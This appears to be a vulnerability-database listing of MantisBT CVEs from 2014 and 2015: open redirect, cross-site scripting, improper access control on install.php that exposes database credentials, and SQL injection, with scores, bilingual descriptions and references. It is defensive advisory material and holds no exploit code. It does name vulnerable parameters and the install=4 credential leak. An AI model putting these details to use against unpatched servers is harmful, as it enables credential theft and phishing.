CVSS: 5.8EPSS: 0%CPEs: 21EXPL: 2CVE-2015-1042 – Mantis BugTracker 1.2.19 Open Redirect
https://notcve.org/view.php?id=CVE-2015-1042
The string_sanitize_url function in core/string_api.php in MantisBT 1.2.0a3 through 1.2.18 uses an incorrect regular expression, which allows remote attackers to conduct open redirect and phishing attacks via a URL with a ":/" (colon slash) separator in the return parameter to login_page.php, a different vulnerability than CVE-2014-6316. La función string_sanitize_url en core/string_api.php en MantisBT 1.2.0a3 hasta 1.2.18 utiliza una expresión regular incorrecta, lo que permite a atacantes remotos realizar ataques de redirección abierta y phishing a través de una URL con un separador ':/' (dos puntos barra oblicua) en el parámetro return en login_page.php, una vulnerabilidad diferente a CVE-2014-6316. Mantis BugTracker version 1.2.19 suffers from an open redirection vulnerability. • http://packetstormsecurity.com/files/130142/Mantis-BugTracker-1.2.19-Open-Redirect.html http://seclists.org/fulldisclosure/2015/Jan/110 http://www.openwall.com/lists/oss-security/2015/01/10/5 http://www.openwall.com/lists/oss-security/2015/01/11/8 http://www.securitytracker.com/id/1031633 https://www.mantisbt.org/bugs/view.php?id=17997 •
CVSS: 4.3EPSS: 0%CPEs: 2EXPL: 2CVE-2014-9571 – MantisBT 1.2.17 XSS / Improper Access Control / SQL Injection
https://notcve.org/view.php?id=CVE-2014-9571
Cross-site scripting (XSS) vulnerability in admin/install.php in MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 allows remote attackers to inject arbitrary web script or HTML via the (1) admin_username or (2) admin_password parameter. Vulnerabilidad de XSS en admin/install.php en MantisBT anterior a 1.2.19 y 1.3.x anterior a 1.3.0-beta.2 permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a través del parámetro (1) admin_username o (2) admin_password. MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities. • http://seclists.org/oss-sec/2015/q1/156 http://www.securitytracker.com/id/1031633 https://exchange.xforce.ibmcloud.com/vulnerabilities/100209 https://github.com/mantisbt/mantisbt/commit/132cd6d0 https://github.com/mantisbt/mantisbt/commit/6d47c047 https://www.htbridge.com/advisory/HTB23243 https://www.mantisbt.org/bugs/view.php?id=17937 https://www.mantisbt.org/bugs/view.php?id=17938 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •
CVSS: 7.5EPSS: 1%CPEs: 2EXPL: 0CVE-2014-9572 – MantisBT 1.2.17 XSS / Improper Access Control / SQL Injection
https://notcve.org/view.php?id=CVE-2014-9572
MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 does not properly restrict access to /*/install.php, which allows remote attackers to obtain database credentials via the install parameter with the value 4. MantisBT anterior a 1.2.19 y 1.3.x anterior a 1.3.0-beta.2 no restringe correctamente el acceso a /*/install.php, lo que permite a atacantes remotos obtener credenciales de la base de datos a través del parámetro install con el valor 4. MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities. • http://seclists.org/oss-sec/2015/q1/158 http://www.securitytracker.com/id/1031633 https://exchange.xforce.ibmcloud.com/vulnerabilities/100211 https://www.htbridge.com/advisory/HTB23243 https://www.mantisbt.org/bugs/view.php?id=17937 https://www.mantisbt.org/bugs/view.php?id=17939 • CWE-284: Improper Access Control •
CVSS: 6.0EPSS: 0%CPEs: 2EXPL: 2CVE-2014-9573 – MantisBT 1.2.17 XSS / Improper Access Control / SQL Injection
https://notcve.org/view.php?id=CVE-2014-9573
SQL injection vulnerability in manage_user_page.php in MantisBT before 1.2.19 and 1.3.x before 1.3.0-beta.2 allows remote administrators with FILE privileges to execute arbitrary SQL commands via the MANTIS_MANAGE_USERS_COOKIE cookie. Vulnerabilidad de inyección SQL en manage_user_page.php en MantisBT anterior a 1.2.19 y 1.3.x anterior a 1.3.0-beta.2 permite a administradores remotos con privilegios FILE ejecutar comandos SQL arbitrarios a través de la cookie MANTIS_MANAGE_USERS_COOKIE. MantisBT version 1.2.17 suffers from improper access control, cross site scripting, and remote SQL injection vulnerabilities. • http://seclists.org/oss-sec/2015/q1/157 http://www.securitytracker.com/id/1031633 https://exchange.xforce.ibmcloud.com/vulnerabilities/100210 https://github.com/mantisbt/mantisbt/commit/69c2d28d https://github.com/mantisbt/mantisbt/commit/7cc4539f https://www.htbridge.com/advisory/HTB23243 https://www.mantisbt.org/bugs/view.php?id=17937 https://www.mantisbt.org/bugs/view.php?id=17940 • CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') •
CVSS: 2.6EPSS: 0%CPEs: 42EXPL: 0CVE-2014-9269
https://notcve.org/view.php?id=CVE-2014-9269
Cross-site scripting (XSS) vulnerability in helper_api.php in MantisBT 1.1.0a1 through 1.2.x before 1.2.18, when Extended project browser is enabled, allows remote attackers to inject arbitrary web script or HTML via the project cookie. Vulnerabilidad de XSS en helper_api.php en MantisBT 1.1.0a1 hasta 1.2.x anterior a 1.2.18, cuando el navegador de proyectos extendidos está habilitado, permite a atacantes remotos inyectar secuencias de comandos web o HTML arbitrarios a través de la cookie de proyectos. • http://seclists.org/oss-sec/2014/q4/867 http://seclists.org/oss-sec/2014/q4/902 http://secunia.com/advisories/62101 http://www.debian.org/security/2015/dsa-3120 https://github.com/mantisbt/mantisbt/commit/511564cc https://www.mantisbt.org/bugs/view.php?id=17890 • CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') •